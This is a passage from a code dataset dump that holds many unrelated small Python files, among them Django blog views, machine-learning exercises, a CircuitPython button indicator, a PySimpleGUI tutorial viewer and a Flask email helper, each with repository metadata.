to BRL requires multiplying by the exchange rate\r\n\r\nprint(\"A) \", totalDolar)\r\nprint(\"B) \", totalReal - (totalReal * iof))\r\nprint(\"C) \", totalReal * iof)\r\n\r\n","repo_name":"sadrack404/exercicios-python","sub_path":"ex.6.1/ex6.3.py","file_name":"ex6.3.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} {"seq_id":"21481471436","text":"from django.conf.urls import url\nfrom . 
import views\n \nurlpatterns = [\n # url( r'^$',views.index, name ='index' ),\n\n url( r'^groups$',views.groups, name ='groups' ),\n url( r'^group/(?P\\d+)$', views.group, name='group' ),\n url( r'^groupedit/(?P\\d+)$', views.groupedit, name='groupedit'),\n url( r'^groupdelete/(?P\\d+)$', views.groupdelete, name='groupdelete'),\n url( r'^groupcreate/$', views.groupcreate, name='groupcreate' ),\n \n url( r'^students$',views.students, name ='students' ),\n url( r'^student/(?P\\d+)$',views.student, name ='student' ),\n url( r'^studentedit/(?P\\d+)$', views.studentedit, name='studentedit'),\n \n url( r'^teachers$', views.teachers, name='teachers'),\n url( r'^teacher/(?P\\d+)$', views.teacher, name='teacher' ),\n url( r'^teachercreate/$', views.teachercreate, name='teachercreate' ),\n url( r'^teacheredit/(?P\\d+)$', views.teacheredit, name='teacheredit'),\n url( r'^teacherdelete/(?P\\d+)$', views.teacherdelete, name='teacherdelete'),\n\n url( r'^users/$', views.users, name='users' ),\n url( r'^userManager/$',views.userManager, name ='userManager' )\n]\n","repo_name":"Kolemannn/KR","sub_path":"django/example1/store/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20833654960","text":"import numpy as np\nimport pandas as pd\nimport pickle\nimport warnings\nfrom tqdm import tqdm\nimport time\nfrom collections import defaultdict\nimport matplotlib.pyplot as plt\n\nwarnings.filterwarnings('ignore')\n\ntrain = pd.read_csv('../IA2-train.csv')\ndev = pd.read_csv('../IA2-dev.csv')\n\n# np.random.shuffle(train.values)\n# np.random.shuffle(dev.values)\n\n# normalization\nnumerical_col = ['Age', 'Annual_Premium', 'Vintage']\nnumerical_col_mean = []\nnumerical_col_std = []\n\nfor col in numerical_col:\n numerical_col_mean.append(train[col].mean())\n numerical_col_std.append(train[col].std())\n train[col] = (train[col] - train[col].mean()) / train[col].std()\n\ndev = pd.read_csv('../IA2-dev.csv')\n\nfor i, col in enumerate(numerical_col):\n dev[col] = (dev[col] - numerical_col_mean[i]) / numerical_col_std[i]\n\n# replace target 0 with -1\ntrain['Response'][train['Response'] == 0] = -1\ndev['Response'][dev['Response'] == 0] = -1\n\n\ndef predict_acc(x, y, w):\n return (np.where(x.dot(w) >= 0, 1, -1) == y).mean()\n\n\ndef kernel_function(x1, x2, p):\n return np.power(np.dot(x1, x2.T), p)\n\n\n# print(train.iloc[0, :-1])\n# print(kernel_function(dev.iloc[:, :-1], train.iloc[:, :-1], 1).shape)\n\n\ndef kernelized_perceptron(data, p, max_iter=100, training_size=6000):\n train, dev = data\n data = pd.concat([train, dev])\n x, y = data.iloc[:training_size, :-1], data.iloc[:training_size, -1]\n dev_x, dev_y = data.iloc[training_size:, :-1], data.iloc[training_size:, -1]\n\n start = time.time()\n\n k_train = kernel_function(x, x, p)\n k_valid = kernel_function(dev_x, x, p)\n a = np.zeros(x.shape[0])\n\n train_acc_his = []\n valid_acc_his = []\n\n for _ in tqdm(range(max_iter)):\n train_acc = 0\n valid_acc = 0\n\n u = np.dot(k_train, a * y)\n S = np.where((y * u) <= 0, 1, 0)\n a = a + S\n\n train_acc = x.shape[0] - S.sum()\n\n valid_acc = np.where((np.dot(k_valid, a * y) * dev_y) > 0, 1, 0).sum()\n\n train_acc_his.append(train_acc / train.shape[0])\n valid_acc_his.append(valid_acc / dev.shape[0])\n\n end = time.time()\n\n with open(\"train_acc_\" + str(p) + \".pkl\", 'wb') as f:\n pickle.dump(train_acc_his, f)\n\n with open(\"valid_acc_\" + str(p) + \".pkl\", 'wb') as f:\n 
pickle.dump(valid_acc_his, f)\n\n return end - start\n\n\n######################################################################################\n# (a)\n\nkernelized_perceptron((train, dev), 1)\n\nwith open(\"train_acc_\" + str(1) + \".pkl\", 'rb') as f:\n train_acc_his = pickle.load(f)\nwith open(\"valid_acc_\" + str(1) + \".pkl\", 'rb') as f:\n valid_acc_his = pickle.load(f)\n\nfig, ax = plt.subplots()\nax.plot(train_acc_his, label=\"train accuracy\")\nax.plot(valid_acc_his, label=\"validation accuracy\")\nplt.legend()\nplt.title(\"accuracy with p=\" + str(1))\nplt.savefig(\"accuracy_p\" + str(1) + \".png\")\n\nprint(\" \")\n\n######################################################################################\n# (b)\n\nrun_time = {}\n\nfor ts in [10, 100, 1000, 10000]:\n run_time[str(ts)] = kernelized_perceptron((train, dev), 1, training_size=ts)\n\nprint(run_time)\nfig, ax = plt.subplots()\nax.bar(run_time.keys(), run_time.values())\nplt.title(\"run time respect to the size of training set\")\nplt.savefig(\"time.png\")\nprint(\" \")\n","repo_name":"tso2381637/AI534","sub_path":"IA3/part2b/IA3_part2b.py","file_name":"IA3_part2b.py","file_ext":"py","file_size_in_byte":3258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19733170499","text":"#!/usr/bin/python3\n\"\"\"[python script to calculate island perimeter]\n\"\"\"\n\n\ndef island_perimeter(grid):\n \"\"\"[island_perimeter]\n\n Args:\n grid ([list of list of integers]): [island]\n\n Returns:\n [integer]: [perimeter of the island]\n \"\"\"\n area = 0\n for row in grid + list(map(list, zip(*grid))):\n for i, j in zip([0] + row, row + [0]):\n area += int(i != j)\n return area\n","repo_name":"IhebChatti/holbertonschool-interview","sub_path":"0x1C-island_perimeter/0-island_perimeter.py","file_name":"0-island_perimeter.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2966661607","text":"n = input()\na = [0]*10\n\nfor i in str(n):\n digit = int(i)\n a[digit]+=1\n\nfor i in range(10):\n if a[i]>0:\n print(i, a[i])\n\nn = input()\n# ls = [i for i in input()]\nls = list(map(int, input().split()))\n# print(ls)\nminnls = []\n\nfor i in range(len(ls)):\n minn = min(ls)\n minnls.append(minn)\n ls.remove(minn)\n\nprint(*minnls)\n\nsadasda = int(input())\nn = list(map(int,input().split()))\ncount = [0]*201\nfor i in n:\n count[i+100]+=1\nprint(count)\nfor i in range(201):\n if count[i]>0:\n print((str(i-100)+' ')*count[i], end = '')\nprint(count)\n# print(count)\n","repo_name":"InfectedRat/legendary-octo-doodle","sub_path":"5.4 stepik.py","file_name":"5.4 stepik.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34344892731","text":"from setuptools import setup, find_packages\n\nversion = \"1.0\"\nsetup(name=\"chomp\",\n packages=find_packages(),\n version=version,\n description=\"Staffjoy V1 Forecast to Shifts Decomposition Tool\",\n author=\"Philip Thomas\",\n author_email=\"philip@staffjoy.com\",\n license=\"MIT\",\n url=\"https://github.com/staffjoy/chomp-decomposition\",\n download_url=\"https://github.com/StaffJoy/chomp-decomposition/archive/%s.tar.gz\" % version,\n keywords=[\"staffjoy-api\", \"staffjoy\", \"staff joy\", \"chomp\"],\n install_requires=[\"requests[security]\"], 
)\n\n\n","repo_name":"Staffjoy/chomp-decomposition","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"21"} +{"seq_id":"27675287984","text":"print('===== LOJA SUPER BARATAO =====')\nsoma = produtomais1000 = barato = c = 0\nnomebarato = ''\n\nwhile True:\n print('')\n produto = str(input('NOME DO PRODUTO: '))\n preco = float(input('PREÇO DO PRODUTO: '))\n\n soma = soma + preco\n\n if preco > 1000:\n produtomais1000 += 1\n\n c += 1\n\n if c == 1 or preco < barato:\n barato = preco\n nomebarato = produto\n\n continuar = str(input('DESEJA CONTINUAR[S/N]: '))\n \n while continuar not in 'SsNn':\n continuar = str(input('DESEJA CONTINUAR[S/N]: '))\n \n if continuar in 'Nn':\n break\n\nprint('')\nprint('O TOTAL DAS COMPRAS FOI DE R$: {} '.format(soma))\nprint('HÁ {} PRODUTOS COM PREÇO MAIOR DE R$ 1000,00'.format(produtomais1000))\nprint('O PRODUTO MAIS BARATO É A {} QUE CUSTA {}'.format(nomebarato, barato))\n","repo_name":"CarlosNazario2010/Python-Fundamentos-1","sub_path":"69_FazendoCompras.py","file_name":"69_FazendoCompras.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38661904261","text":"from matplotlib import pyplot as plt\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\nfrom matplotlib.collections import PolyCollection\r\nimport numpy as np\r\nimport random\r\n\r\nfrom single_sample_data import cell_count_list\r\n\r\npath = \"C:/Users/Jordan Chen/Desktop/要的/實驗室/data/2022 data/ROS/ROS_DHE excel檔/\"\r\n\r\nfig = plt.figure()\r\nax = plt.axes(projection='3d')\r\n\r\nyaxis = 0\r\ndy = 0.01\r\ndx = 0.01\r\n\r\ndata1 = cell_count_list(\"WT1_0\", 0, path)\r\ndata2 = cell_count_list(\"WT1_4\", 0, path)\r\ndata3 = cell_count_list(\"WT1_6\", 0, path)\r\ndata4 = cell_count_list(\"WT1_8\", 0, path)\r\ndata5 = cell_count_list(\"WT1_12\", 0, path)\r\n\r\ndef plot_(data, n = 1 , color=\"silver\"): #n:第幾行(y軸)\r\n\tdata_h = plt.hist(data, bins=300, alpha = 0, color = color)\r\n\tz = list(data_h[0])\r\n\tz.append(0)\r\n\tax.bar3d(data_h[1] , (n-1)* 50 , 0, dx, dy , z , color= color)\r\n\r\nplot_(data1, 1, \"black\")\r\nplot_(data2, 2, \"silver\")\r\nplot_(data3, 3)\r\nplot_(data4, 4)\r\nplot_(data5, 5)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nplt.show()\r\n\r\n\r\n\r\n\r\n","repo_name":"jordanchen1112/Image","sub_path":"3Dplot.py","file_name":"3Dplot.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70866495413","text":"import board\nfrom microcontroller import watchdog as w\nfrom microcontroller import nvm\nfrom watchdog import WatchDogMode\nimport circuitpython_schedule as schedule\n\nfrom display import Display\nfrom neokeys import NeoKeys\nfrom net import Net\nfrom env import Env\n\nw.timeout=300 # Set a timeout of 5 minutes\nw.mode = WatchDogMode.RESET\n\nnet = Net()\nnet.connect()\nntp_time = net.time()\nmqtt = net.mqtt()\n\ni2c_bus = board.I2C()\nenv = Env(i2c_bus)\nneokeys = NeoKeys(i2c_bus)\ndisplay = Display(env, ntp_time)\n\n#Global Mutable State\nbutton_state = nvm[0]\nif button_state < 0 or button_state > 3:\n button_state = 2\nlast_ts = ntp_time.now()\n\ndef tick():\n # diff = last_ts.timestamp() - ntp_time.now().timestamp()\n diff = ntp_time.now().timestamp()\n neokeys.leds(button_state)\n display.show(button_state, 
diff)\n\nschedule.every(10).seconds.do(tick)\nschedule.every(1).minutes.do(mqtt.env_lambda(env))\nschedule.every().hour.do(ntp_time.sync_time)\n\ndef set_state(new_state):\n    global button_state\n    nvm[0] = new_state\n    if button_state != new_state:\n        mqtt.button_event(new_state, button_state)\n        last_ts = ntp_time.now()\n        button_state = new_state\n    tick()\n\ntick()\n\nwhile True:\n    key = neokeys.scan()\n    if key >= 0:\n        set_state(key)\n    schedule.run_pending()\n","repo_name":"BrianEdwards85/indicator","sub_path":"esp32/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} {"seq_id":"22269076628","text":"from django.db.models import Q\nfrom django.shortcuts import render\nfrom Blog.models import Article, Category, Banner, Tag, Link\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nimport markdown\n\n\ndef global_variable(request):\n    name = Category.objects.all()\n    remen = Article.objects.filter(tui_id=3)[:6]\n    tags = Tag.objects.all()\n    return locals()\n\n\ndef index(request):\n    article = Article.objects.all().order_by('-id')[0:10]\n    tui = Article.objects.filter(tui_id=2)[:3]\n    ban = Banner.objects.filter(is_active=True)[0:4]\n    hot = Article.objects.all().order_by('views')[:10]\n    link = Link.objects.all()\n    return render(request, 'index.html', locals())\n\n\ndef list(request, lid):\n    list = Article.objects.filter(category_id=lid)  # filter articles by the lid passed in from the URL\n    cname = Category.objects.get(id=lid)  # get the name of the current article's category\n    page = request.GET.get('page')  # get the current page number from the URL\n    paginator = Paginator(list, 2)  # paginate the queried list object, 2 records per page\n    try:\n        list = paginator.page(page)  # get the records for the current page\n    except PageNotAnInteger:\n        list = paginator.page(1)  # if the user input is not an integer, show the first page\n    except EmptyPage:\n        list = paginator.page(paginator.num_pages)  # if the page number is out of range, show the last page\n    return render(request, 'list.html', locals())  # locals() returns a dict of all variables and their values in the current scope\n\n\ndef show(request, sid):\n    show = Article.objects.get(id=sid)  # look up the article with the given ID\n    allcategory = Category.objects.all()  # categories shown in the navigation\n    hot = Article.objects.all().order_by('?')[:10]  # random recommendations\n    show.body = markdown.markdown(show.body,extensions=[\n        'markdown.extensions.extra',\n        'markdown.extensions.codehilite',\n        'markdown.extensions.toc',\n    ])\n    precious_blog = Article.objects.filter(created_time__gt=show.created_time, category=show.category.id).first()\n    next_blog = Article.objects.filter(created_time__lt=show.created_time, category=show.category.id).last()\n    show.views = show.views + 1\n    show.save()\n    page = request.GET.get('page')\n    list = show.body\n    paginator = Paginator(list, 2000)  # paginate after 2000 characters\n    try:\n        list = paginator.page(page)\n    except PageNotAnInteger:\n        list = paginator.page(1)\n    except EmptyPage:\n        list = paginator.page(paginator.num_pages)\n    return render(request, 'show.html', locals())\n\n\ndef tag(request, tag):\n    list = Article.objects.filter(tags__name=tag)  # find the articles matching the given tag\n    tname = Tag.objects.get(name=tag)\n    page = request.GET.get('page')\n    paginator = Paginator(list,2)  # paginate, 2 records per page\n    try:\n        list = paginator.page(page)\n    except PageNotAnInteger:\n        list = paginator.page(1)\n    except EmptyPage:\n        list = paginator.page(paginator.num_pages)\n    return render(request,'tags.html',locals())\n\n\ndef search(request):\n    ss = request.GET.get('search')  # get the search keyword\n    list = Article.objects.filter(Q(title__icontains=ss)|Q(body__icontains=ss))  # match the keyword against the database; icontains is case-insensitive, contains is an exact, case-sensitive match\n    page = request.GET.get('page')\n    paginator = Paginator(list, 
2)\n    try:\n        list = paginator.page(page)\n    except PageNotAnInteger:\n        list = paginator.page(1)\n    except EmptyPage:\n        list = paginator.page(paginator.num_pages)\n    return render(request, 'search.html', locals())\n\n\ndef about(request):\n    allcategory = Category.objects.all()\n    return render(request, 'page.html', locals())\n","repo_name":"NOTLOOK/newDjango","sub_path":"Blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3764,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} {"seq_id":"28768070891","text":"import sys\nimport time\nimport os\nimport json\nimport configparser\nfrom datetime import datetime\n\nimport logging\nlogger = logging.getLogger(__name__)\n\nif __name__ == '__main__':\n    from jsonfile import JsonFile\n    from utils import compress_abs_path\nelse:\n    from .jsonfile import JsonFile\n    from .utils import compress_abs_path\n\nimport PySimpleGUI as sg\n\n\nTUTORIAL_JSON_FILE = 'tutorial.json'\nLESSON_JSON_FILE = 'lesson.json'\nLESSON_DIR = 'lesson'\n\n###############################################################################\n\nclass TutorialJson(JsonFile):\n    \"\"\"\n    Manage tutorial and lesson JSON files. Keep tag names and formats consistent.\n    The tutorial and lesson JSON files have nearly identical keys and since this is\n    not a generic utility this one class takes care of both file types.\n    \"\"\"\n    def __init__(self, json_file):\n        super().__init__(json_file)\n    \n    def lesson_slide(self):\n        return self.json['current-slide']\n\n    def lesson_complete(self):\n        return self.json['complete']\n\n    def reset_child(self):\n        if 'current-slide' in self.json:\n            self.json['current-slide'] = 1\n            self.json['complete'] = False\n\n    def set_complete(self, complete):\n        self.json['complete'] = complete\n\n    def set_slide(self, slide):\n        self.json['current-slide'] = slide\n    \n    \n###############################################################################\n\n\nclass Lesson():\n    \"\"\"\n    Manage the display for a lesson. The lesson's JSON file is used to \n    determine the initial state. The execute() method allows a lesson to be\n    restarted and override the JSON. 
The new lesson state is recorded in the\n JSON when the lesson is exited.\n \"\"\"\n def __init__(self, number, path, slides):\n\n self.number = number\n self.path = path\n self.slides = slides\n self.slide_max = len(slides)\n self.load_json()\n\n def load_json(self):\n \n self.json = TutorialJson(os.path.join(self.path, LESSON_JSON_FILE))\n \n self.title = self.json.title()\n self.cur_slide = self.json.lesson_slide()\n self.complete = self.json.lesson_complete()\n\n \n def update_slide_file(self):\n self.slide_file = os.path.join(self.path, self.slides[self.cur_slide-1])\n \n \n def gui(self):\n \n self.update_slide_file()\n \n layout = [\n [sg.Text('Slide'), sg.Text(str(self.cur_slide), pad=(2,1), key='-SLIDE-')], \n [sg.Image(filename=self.slide_file, key='-IMAGE-')],\n [sg.Button('Prev', size=(8,2)), sg.Button('Next', size=(8, 2)), sg.Button('Mark as Complete', pad=(10,0))]\n ]\n \n self.window = sg.Window(self.json.title(), layout, element_justification='c', resizable=True, modal=True)\n \n while True:\n\n self.event, self.values = self.window.read()\n \n if self.event in (sg.WIN_CLOSED, 'Exit') or self.event is None:\n break\n\n if self.event == 'Mark as Complete':\n self.json.set_complete(True)\n break\n \n if self.event == 'Prev':\n if self.cur_slide > 1:\n self.cur_slide -= 1\n \n elif self.event == 'Next':\n if self.cur_slide < self.slide_max:\n self.cur_slide += 1\n \n self.update_slide_file()\n logger.debug(\"filename = \" + self.slide_file)\n \n self.window['-SLIDE-'].update(str(self.cur_slide))\n self.window['-IMAGE-'].update(filename=self.slide_file)\n\n self.json.set_slide(self.cur_slide)\n self.json.update()\n self.window.close() \n\n \n def execute(self):\n self.gui()\n return self.json.lesson_complete()\n \n def reset(self):\n self.json.reset()\n self.load_json()\n\n\n###############################################################################\n\n\nclass Tutorial():\n \"\"\"\n Manage the display for a tutorial. A tutorial folder contains a\n tutorial.json that describes the tutorial and a lesson folder that \n contains numbered lesson folders. Each lesson folder contains a \n lesson.json file. \n \"\"\"\n def __init__(self, tutorial_path):\n\n self.path = tutorial_path\n self.json = TutorialJson(os.path.join(tutorial_path, TUTORIAL_JSON_FILE))\n \n self.lesson_path = os.path.join(tutorial_path,LESSON_DIR)\n logger.info(\"self.lesson_path = \" + self.lesson_path)\n self.lesson_list = [int(l) for l in os.listdir(self.lesson_path) if l.isnumeric()]\n self.lesson_list.sort()\n logger.info(\"self.lesson_list = \" + str(self.lesson_list))\n self.lesson_objs = {}\n for l in self.lesson_list:\n lesson_num_path = os.path.join(self.lesson_path, str(l))\n logger.info(\"lesson_num_path = \" + lesson_num_path)\n lesson_pngs = [f for f in os.listdir(lesson_num_path) if f.lower().endswith('.png')]\n lesson_pngs.sort()\n logger.info(\"lesson_pngs = \" + str(lesson_pngs))\n self.lesson_objs[l] = Lesson(l, lesson_num_path, lesson_pngs)\n \n self.display = True\n self.reset = False\n\n def create_window(self):\n \"\"\"\n Create the main window. 
Non-class variables are used so it can be refreshed, PySimpleGui\n        layouts can't be shared.\n        \"\"\"\n        hdr_label_font = ('Arial bold',12)\n        hdr_value_font = ('Arial',12)\n        \n        objective_text = \"\"\n        for objective_line in self.json.objective():\n            objective_text += objective_line\n\n        resume_lesson = 1\n        for lesson in self.lesson_objs.values():\n            if lesson.complete:\n                resume_lesson += 1\n            else:\n                break\n        \n        lesson_layout = []\n        for lesson in self.lesson_objs.values():\n            logger.debug(\"Lesson Layout \" + lesson.title)\n            title = \"%d-%s\" % (lesson.number, lesson.title)\n            complete_state = \"Yes\" if lesson.complete else \"No\"\n            radio_state = True if lesson.number == resume_lesson else False\n            lesson_layout.append([sg.Radio(title, \"LESSONS\", default=radio_state, font=hdr_value_font, size=(30,0), key='-LESSON%d-'%lesson.number), sg.Text(complete_state, key='-COMPLETE%d-'%lesson.number)])\n        \n        \n        # Layouts can't be reused/shared so if someone does a tutorial reset it causes issues if layout is a class variable\n        layout = [\n            [sg.Text('Objectives', font=hdr_label_font)],\n            [sg.MLine(default_text=objective_text, font = hdr_value_font, size=(40, 4))],\n            # Lesson size less than lesson layout so complete status will appear centered \n            [sg.Text('Lesson', font=hdr_label_font, size=(28,0)),sg.Text('Complete', font=hdr_label_font, size=(10,0))], \n            lesson_layout, \n            [sg.Button('Start', button_color=('SpringGreen4')), sg.Button('Reset'), sg.Button('Exit')]\n        ]\n\n        window = sg.Window(self.json.title(), layout, modal=True)\n        return window\n    \n    \n    def gui(self):\n        \"\"\"\n        Navigating through lessons is not strictly enforced. The goal is to keep the user\n        interface very simple so the algorithm to determine which lesson to resume is simplistic\n        and it's up to the user whether they select lessons as completed.\n        \"\"\"\n        \n        while self.display:\n\n            window = self.create_window()\n\n            while True: # Event Loop\n\n                self.event, self.values = window.read(timeout=100)\n                \n                if self.event in (sg.WIN_CLOSED, 'Exit') or self.event is None: \n                    break\n                \n                if self.event == 'Start':\n                    for lesson in self.lesson_objs:\n                        if self.values[\"-LESSON%d-\"%lesson] == True:\n                            if self.lesson_objs[lesson].execute():\n                                window['-COMPLETE%d-'%lesson].update('Yes') \n                \n                if self.event == 'Reset':\n                    for lesson in list(self.lesson_objs.values()):\n                        lesson.reset() \n                    self.reset = True\n                    break\n            \n            self.json.update()\n            window.close()\n            \n            if self.reset:\n                self.reset = False\n            else:\n                self.display = False\n    \n    def execute(self):\n        self.gui()\n\n\n###############################################################################\n\nclass ManageTutorials():\n    \"\"\"\n    Discover what tutorials exist (each tutorial in separate directory) and\n    create a 'database' of information about the tutorials based on each \n    tutorial's JSON spec.\n    Users select tutorials by title so self.tutorial_lookup provides a\n    method to retrieve a tutorial given its title\n    \"\"\"\n    def __init__(self, tutorials_path):\n\n        self.path = tutorials_path\n        self.tutorial_titles = []\n        self.tutorial_lookup = {} # [title] => Tutorial\n        \n        tutorial_list = os.listdir(tutorials_path)\n        tutorial_list.sort()\n        for tutorial_folder in tutorial_list:\n            logger.debug(\"Tutorial folder: \" + tutorial_folder)\n            #todo: Tutorial constructor could raise exception if JSON doesn't exist or is malformed\n            tutorial_json_file = os.path.join(tutorials_path, tutorial_folder, TUTORIAL_JSON_FILE)\n            if os.path.exists(tutorial_json_file):\n                tutorial = Tutorial(os.path.join(tutorials_path, 
tutorial_folder))\n                self.tutorial_titles.append(tutorial.json.title())\n                self.tutorial_lookup[tutorial.json.title()] = tutorial\n        \n        logger.debug(\"Tutorial Titles \" + str(self.tutorial_titles))\n        logger.debug(\"Tutorial Lookup \" + str(self.tutorial_lookup))\n\n    def run_tutorial(self, tutorial_title):\n        if tutorial_title in self.tutorial_titles:\n            self.tutorial_lookup[tutorial_title].execute()\n\n\n###############################################################################\n\nif __name__ == '__main__':\n\n    tutorial_rel_dir = None\n    if len(sys.argv) > 1:\n        tutorial_rel_dir = sys.argv[1]\n    else:\n        tutorial_rel_dir = '1-cfsat-overview'\n    \n    config = configparser.ConfigParser()\n    config.read('../cfsat.ini')\n    TUTORIALS_PATH = config.get('PATHS','TUTORIALS_PATH')\n\n    tutorial_dir = compress_abs_path(os.path.join(os.getcwd(),'..', TUTORIALS_PATH, tutorial_rel_dir)) \n    print (\"tutorial_dir = \" + tutorial_dir)\n    tutorial = Tutorial(tutorial_dir)\n    tutorial.execute()\n    \n    \n\n","repo_name":"OpenSatKit/cfsat","sub_path":"gnd-sys/app/tools/tutorial.py","file_name":"tutorial.py","file_ext":"py","file_size_in_byte":10923,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"21"} {"seq_id":"5914678160","text":"# coding: UTF-8\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\n\n\nclass Config(object):\n    \"\"\"Configuration parameters\"\"\"\n\n    def __init__(self, dataset, embedding):\n        self.model_name = 'NN'\n        self.train_path = dataset + '/data/train.txt'  # training set\n        self.dev_path = dataset + '/data/dev.txt'  # validation set\n        self.test_path = dataset + '/data/test.txt'  # test set\n        self.class_list = [x.strip() for x in open(\n            dataset + '/data/class.txt').readlines()]  # list of class names\n        self.vocab_path = dataset + '/data/vocab.pkl'  # vocabulary\n        self.save_path = dataset + '/saved_dict/' + self.model_name + '.ckpt'  # saved model checkpoint\n        self.log_path = dataset + '/log/' + self.model_name\n        self.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')  # device\n\n        self.dropout = 0.5  # dropout rate\n        self.require_improvement = 1000  # stop training early if no improvement after 1000 batches\n        self.num_classes = len(self.class_list)  # number of classes\n        self.n_vocab = 0  # vocabulary size, assigned at runtime\n        self.num_epochs = 100  # number of epochs\n        self.batch_size = 128  # mini-batch size\n        self.pad_size = 200  # every sentence is padded/truncated to this length\n        self.learning_rate = 1e-3  # learning rate\n        self.hidden_size = 32  # hidden layer size\n        self.encode_size = 1024  # bert hidden size\n\n\n\n'''Neural Networks for Sentence Classification'''\n\n\nclass Model(nn.Module):\n    def __init__(self, config):\n        super(Model, self).__init__()\n        self.dropout = nn.Dropout(config.dropout)\n        self.fc1 = nn.Sequential(nn.Linear(config.pad_size * config.encode_size, config.hidden_size), nn.ReLU(True))\n        self.fc2 = nn.Linear(config.hidden_size, config.num_classes)\n        self.one_layer_fc = nn.Linear(config.encode_size, config.num_classes)\n        self.input_size = config.encode_size\n        self.batch_size = config.batch_size\n\n    def forward(self, x):\n        # print(x[0].shape)\n        out = x[0].view(x[0].shape[0], self.input_size)\n        out = self.one_layer_fc(out)\n        return out\n","repo_name":"TsNFs/SecretProject","sub_path":"ChineseTextClassificationPytorch/models/NN.py","file_name":"NN.py","file_ext":"py","file_size_in_byte":2162,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} {"seq_id":"23108824597","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Oct 29 07:47:13 2019\n\n@author: lzy\n\"\"\"\n\n#import pandas as pd\nimport datetime\n#import numpy as np\n#from pandas import 
DataFrame\n#import os, sys\n#from bs4 import BeautifulSoup as bs\n#from multiprocessing import Pool\nimport argparse\n\n\ngraphfiledir = './Graphs/'\ncsvfiledir = './Analysis/'\n\ndirs = {'CSV':csvfiledir, 'GRAPH':graphfiledir}\n\n\nparser = argparse.ArgumentParser(description='Introduction:\\t'\n 'Use this file to generate analysis files.\\n'\n 'Default values:\\n'\n '-a, default=\\\"指数\\\"\\n'\n '-na, default=\\\"货币, 债券, 理财, 现金, 分级\\\"\\n'\n '-sd/ed, default=[Years-1, Today]\\n'\n '-tP, Testing periods modes, default=customed\\n'\n '-s, stregaties to take\\n'\n '-f, frequency, usually try 14,31\\n'\n '-g, goal profit, usually try 0.05-0.2\\n')\n\nparser.add_argument('--aim', '-a', help='keywords', default='指数')\nparser.add_argument('--negativeaim', '-na', help='keywords to filter out', default='货币, 债券, 理财, 现金, 分级')\n\n\nparser.add_argument('--sdate', '-sd', help='begin date', default='2009-01-01')\n# default=datetime.datetime.today() - datetime.timedelta(days=365*10))\nparser.add_argument('--edate', '-ed', help='end date', default=datetime.datetime.today())\nparser.add_argument('--testingPeriod', '-tP', help='predefined periods', default=None)\nparser.add_argument('--stragety', '-s', help='different ways to invest, see details in ...', default=1)\nparser.add_argument('--frequency', '-f', help='how often do', default='14,31')\nparser.add_argument('--goalProfit', '-g', help='what is the goal profit', default='0.05,0.07,0.1,0.12,0.15,0.17,0.2')\nparser.add_argument('--output', '-ot', help='need the output in report? True as'\n 'report, False as databasefile, None as database', default=False)\n\n\nparser.add_argument('--single', '-sg', help='single fund', default=True)\nparser.add_argument('--code', '-fc', help='fund code', default='090010')\nparser.add_argument('--runWithin', '-rw', help='run within this file', default=True)\nparser.add_argument('--usingOutput', '-u', default=False)\n#parser.add_argument('--csvfiledir', '-cdir', default='./Analysis/')\n\n\nparser.add_argument('--database', '-db', default='funding_search.txt')\nparser.add_argument('--website', '-wb', default='http://fund.eastmoney.com/js/fundcode_search.js')\n\nargs = parser.parse_args()\n#database = pd.DataFrame(columns=funds.colName)\n\n#Possible values\n#'中证500'\n#'沪深300'\n#龙头\n#军工\n#医药\n#白酒\n#消费\n#\n#纳斯达克\n#\n#创业板\n#中小板\n\n\n#pool = Pool(3)\n#\n#for f in analysisF.FREQUENCY:\n# for aimP in np.arange(0.05, 0.25, 0.01):\n# dbanalysis = pool.apply_async(func=analysisF.analysisdata, \n# args=(fre=f, gProft=aimP, )).getValues()\n# database = database.append(dbanalysis)\n# \n#pool.close()\n#pool.join() \n#\n#print(1)\n ","repo_name":"billy31/Simple_Funds_","sub_path":"funds_extrance.py","file_name":"funds_extrance.py","file_ext":"py","file_size_in_byte":3213,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"70357985014","text":"import os\nfrom dotenv import load_dotenv\nfrom flask_mail import Mail, Message\nfrom flask import render_template\nload_dotenv()\n\ndef createConsumptionWarning(value, date, recipients=[os.getenv('WARNING_RECIPIENT')], sender=os.getenv(\"MAIL_USERNAME\")):\n msg = Message(\n subject=\"Poraba kurilnega olja presegla dovoljeno mejo\", \n sender=sender, \n recipients=recipients,\n )\n msg.html = render_template(\"obvestilo_o_preveliki_porabi.html\", date=date, allowed=float(os.getenv('MAX_CONSUMPTION'))*1000, 